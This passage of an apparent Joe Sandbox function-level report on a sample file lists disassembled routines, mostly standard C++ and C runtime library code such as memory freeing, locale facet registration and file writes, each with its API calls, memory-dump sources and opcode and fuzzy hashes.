                                      • Part of subcall function 00880123: GetLastError.KERNEL32(?,?,0087DA9C), ref: 0088014B
                                    • _free.LIBCMT ref: 00889C56
                                    • _free.LIBCMT ref: 00889C61
                                    • _free.LIBCMT ref: 00889CB5
                                    • _free.LIBCMT ref: 00889CC0
                                    • _free.LIBCMT ref: 00889CCB
                                    • _free.LIBCMT ref: 00889CD6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5f704675926726e94485f9efb5d3adcd103950d42416eb40a74191f57f073585
                                    • Instruction ID: 1d23d06a64367cf9c7b431ff488914c2f8de3b4070ed2f77637919cef2e52ffe
                                    • Opcode Fuzzy Hash: 5f704675926726e94485f9efb5d3adcd103950d42416eb40a74191f57f073585
                                    • Instruction Fuzzy Hash: 99114C72590B04AAD661FBB4CC0BFDB7B9CFF04B20F440819F2D9F6152EA65B5088B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008817B1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleCP.KERNEL32(00873AC2,00000000,00000001), ref: 008817F9
                                    • __fassign.LIBCMT ref: 008819D8
                                    • __fassign.LIBCMT ref: 008819F5
                                    • WriteFile.KERNEL32(?,00000001,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00881A3D
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00881A7D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00881B29
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 80ba69a9bcf5eca7d2a3223b272f4b32aee685b1954ab4c5662708c491da9b51
                                    • Instruction ID: 19af6b13ae8941a66fa43c39253cf7797201355dc0dbab8b4d699195d8801f7e
                                    • Opcode Fuzzy Hash: 80ba69a9bcf5eca7d2a3223b272f4b32aee685b1954ab4c5662708c491da9b51
                                    • Instruction Fuzzy Hash: B7D19C75D012589FCF15DFE8C8849EDBBB9FF48314F28416AE859FB242DA30A946CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082EAE4 Relevance: 9.1, APIs: 6, Instructions: 128COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0082EAF7
                                    • int.LIBCPMT ref: 0082EB0E
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • std::_Facet_Register.LIBCPMT ref: 0082EB48
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0082EB5E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0082EB73
                                    • _Deallocate.LIBCONCRT ref: 0082EC3C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_Register
                                    • String ID:
                                    • API String ID: 55420841-0
                                    • Opcode ID: c1006808c43e2b8653f931a128fc4377271dafad2c3eba0fb609255bd3d72a7a
                                    • Instruction ID: c10c7999a0b641aa31fc22d8e673a17461050b087bb04976135dc8df6211ecd0
                                    • Opcode Fuzzy Hash: c1006808c43e2b8653f931a128fc4377271dafad2c3eba0fb609255bd3d72a7a
                                    • Instruction Fuzzy Hash: 3741A471A002159FCB24DF6CD4859AEBBF5FF44320B24462DE966E7391DB30AE41CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008710B9 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,008710B0,00870EE6,0086E5FE), ref: 008710C7
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008710D5
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008710EE
                                    • SetLastError.KERNEL32(00000000,008710B0,00870EE6,0086E5FE), ref: 00871140
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6e925ce5bb8eb78074ea9f6a87f94f9ab12ee27c28fc8179b464f56f9a9cab91
                                    • Instruction ID: 886ee5765f0b235e9e3fa5d3151ec50a03aaaa91b79990aed714cb7b792eccd6
                                    • Opcode Fuzzy Hash: 6e925ce5bb8eb78074ea9f6a87f94f9ab12ee27c28fc8179b464f56f9a9cab91
                                    • Instruction Fuzzy Hash: 2A014C32229A225EAF14377E6C8D5263769FB157B4720C339F11CC54EDEF11CC119251
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008336E9 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileW.KERNEL32(00000000), ref: 00833721
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00833728
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDelete
                                    • String ID:
                                    • API String ID: 2910425767-0
                                    • Opcode ID: 99e404072cf06ced04de3b723fc019ab7ce979b79db4c9d022b2fac1a04f3d59
                                    • Instruction ID: 3d74b568fc96c9544eda8fc4b1c4509298709b9b098bb23f33582c822215ffce
                                    • Opcode Fuzzy Hash: 99e404072cf06ced04de3b723fc019ab7ce979b79db4c9d022b2fac1a04f3d59
                                    • Instruction Fuzzy Hash: F901F7F620AA25ABD7153B7CACC456E3658FB86375F240236F623C61C0CB24CA0243E6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C09E Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C0AF
                                    • int.LIBCPMT ref: 0085C0C6
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • messages.LIBCPMT ref: 0085C0E9
                                    • std::_Facet_Register.LIBCPMT ref: 0085C100
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C120
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C12D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: 2cf0f5452b8bff6b6369e284fd3a2042c0353abc253245a7b45a6ebee7f1f7fc
                                    • Instruction ID: 58a23fb2fe0a4d944d131b21aada49efab74890a752e62564fdfa2cf5e5c7b73
                                    • Opcode Fuzzy Hash: 2cf0f5452b8bff6b6369e284fd3a2042c0353abc253245a7b45a6ebee7f1f7fc
                                    • Instruction Fuzzy Hash: 7F010475900A199FCF01BB68C806AAD7765FF84361F284109FD10E72D2DF349A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008570FE Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085710F
                                    • int.LIBCPMT ref: 00857126
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • numpunct.LIBCPMT ref: 00857149
                                    • std::_Facet_Register.LIBCPMT ref: 00857160
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00857180
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085718D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: ca2cfcc669302094f0caef99f37ab3f2fba802ff78837cc49f4bb8a9462905e2
                                    • Instruction ID: ee3c80129d5b259309915e59a0d6aac77d02f6afc5355089c7a34b5becd73404
                                    • Opcode Fuzzy Hash: ca2cfcc669302094f0caef99f37ab3f2fba802ff78837cc49f4bb8a9462905e2
                                    • Instruction Fuzzy Hash: EB0100358045299BCB00EBA8D815ABDBB69FF84321F284108FC51EB291CF309E49C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C009 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C01A
                                    • int.LIBCPMT ref: 0085C031
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • ctype.LIBCPMT ref: 0085C054
                                    • std::_Facet_Register.LIBCPMT ref: 0085C06B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C08B
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C098
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
                                    • String ID:
                                    • API String ID: 3097546199-0
                                    • Opcode ID: 8583ce774dcc09e0df2d5bb8d33d8abc086cb5af838a50ce7b67eb425b778146
                                    • Instruction ID: 74252c41dbe1123926c7bc72f764d5d685e0f7b0d005cf0e28aeaebe8b2254db
                                    • Opcode Fuzzy Hash: 8583ce774dcc09e0df2d5bb8d33d8abc086cb5af838a50ce7b67eb425b778146
                                    • Instruction Fuzzy Hash: 4501E1358006199BCB00AB68C805AAD7B65FF40321F284108FD10E72D0CF349E49CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C133 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C144
                                    • int.LIBCPMT ref: 0085C15B
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • messages.LIBCPMT ref: 0085C17E
                                    • std::_Facet_Register.LIBCPMT ref: 0085C195
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C1B5
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C1C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: c1e75116ae9b26962277ea50b65c8793c0f2b0a936a527979aee7684db797532
                                    • Instruction ID: 91720e1fc7c4869680f3b1f311be16997b887eb98e06ae20dd39e661bd8a3820
                                    • Opcode Fuzzy Hash: c1e75116ae9b26962277ea50b65c8793c0f2b0a936a527979aee7684db797532
                                    • Instruction Fuzzy Hash: 5401E5359006159BCB04EB6888156ADBB69FF40315F240109FD10EB291CF309E49CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008694AC Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 008694BD
                                    • int.LIBCPMT ref: 008694D4
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • messages.LIBCPMT ref: 008694F7
                                    • std::_Facet_Register.LIBCPMT ref: 0086950E
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0086952E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0086953B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: ff7a66c7d844b0790c5a7bb65425b1f3ee966b21b4a55c8e12f093be645e62c0
                                    • Instruction ID: f6eb6746404c1b383b50cd3876029bc800161e1c3e83e6d875ce701168ad6305
                                    • Opcode Fuzzy Hash: ff7a66c7d844b0790c5a7bb65425b1f3ee966b21b4a55c8e12f093be645e62c0
                                    • Instruction Fuzzy Hash: BB01C0759001198BCF05FBA8C85AABDBB69FF84720F290149F951E72D1DF309A46C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C4B1 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C4C2
                                    • int.LIBCPMT ref: 0085C4D9
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 0085C4FC
                                    • std::_Facet_Register.LIBCPMT ref: 0085C513
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C533
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C540
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 771e600d589dc171c17d52c58d90c4bb6330d0c95573a2658e234bdce987ff19
                                    • Instruction ID: fef730d5efd61bb151b27de53dcb6daf624220aef178d88b0de5c366c73468af
                                    • Opcode Fuzzy Hash: 771e600d589dc171c17d52c58d90c4bb6330d0c95573a2658e234bdce987ff19
                                    • Instruction Fuzzy Hash: CE01C4359102199FCF04EBA8C855ABE7B65FF84721F680149FD10E7391EF30AA49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00869417 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00869428
                                    • int.LIBCPMT ref: 0086943F
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • collate.LIBCPMT ref: 00869462
                                    • std::_Facet_Register.LIBCPMT ref: 00869479
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00869499
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 008694A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
                                    • String ID:
                                    • API String ID: 3223962878-0
                                    • Opcode ID: a9e8509611f42ce7e781c4d5b7a2d64ade8742abf238a24b7a3a44bc2ab8525b
                                    • Instruction ID: f402ca450bec0a8fa9a82f6ebd4832a555136687296ddf29325799317e01ec2c
                                    • Opcode Fuzzy Hash: a9e8509611f42ce7e781c4d5b7a2d64ade8742abf238a24b7a3a44bc2ab8525b
                                    • Instruction Fuzzy Hash: E901C4359001159BCB05EBA8C815ABD7B69FF84320F1A4149F950E73D1DF309E46CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C41C Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C42D
                                    • int.LIBCPMT ref: 0085C444
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 0085C467
                                    • std::_Facet_Register.LIBCPMT ref: 0085C47E
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C49E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C4AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: b4cc446db8778f30e70f6847d053e5ff17da26a1ebd4a79d75c83babb7d3f0bb
                                    • Instruction ID: 08983bb62255f50b2686a06502462897561cc9fc3e91241c73cf28224fba84d0
                                    • Opcode Fuzzy Hash: b4cc446db8778f30e70f6847d053e5ff17da26a1ebd4a79d75c83babb7d3f0bb
                                    • Instruction Fuzzy Hash: AB0104758002199FCB00EB68C815ABD7B75FF84721F684109FC00E72C0CF709A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C5DB Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C5EC
                                    • int.LIBCPMT ref: 0085C603
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 0085C626
                                    • std::_Facet_Register.LIBCPMT ref: 0085C63D
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C65D
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C66A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: c217c5669110ac46ad0d4d2c6163b7042eff0e176e4d07cddca11cc9bfe5e0c2
                                    • Instruction ID: dc43994cb78a5e9a6ac7cfd2a78054c10f39cd6f97ea166dc76d473114af16ec
                                    • Opcode Fuzzy Hash: c217c5669110ac46ad0d4d2c6163b7042eff0e176e4d07cddca11cc9bfe5e0c2
                                    • Instruction Fuzzy Hash: 9701C8359001158FCB04EB68C855ABD77B5FF54711F640149FD11E7391DF709A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0085C546 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0085C557
                                    • int.LIBCPMT ref: 0085C56E
                                      • Part of subcall function 00811837: std::_Lockit::_Lockit.LIBCPMT ref: 00811848
                                      • Part of subcall function 00811837: std::_Lockit::~_Lockit.LIBCPMT ref: 00811862
                                    • moneypunct.LIBCPMT ref: 0085C591
                                    • std::_Facet_Register.LIBCPMT ref: 0085C5A8
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0085C5C8
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0085C5D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 059406226580be624ed6c56c387c61032cef32238621074b8da740b116979db0
                                    • Instruction ID: 205a0575ebec83c70b9528d87f594378d3d9e35fa912f968f0459198d80ddd8d
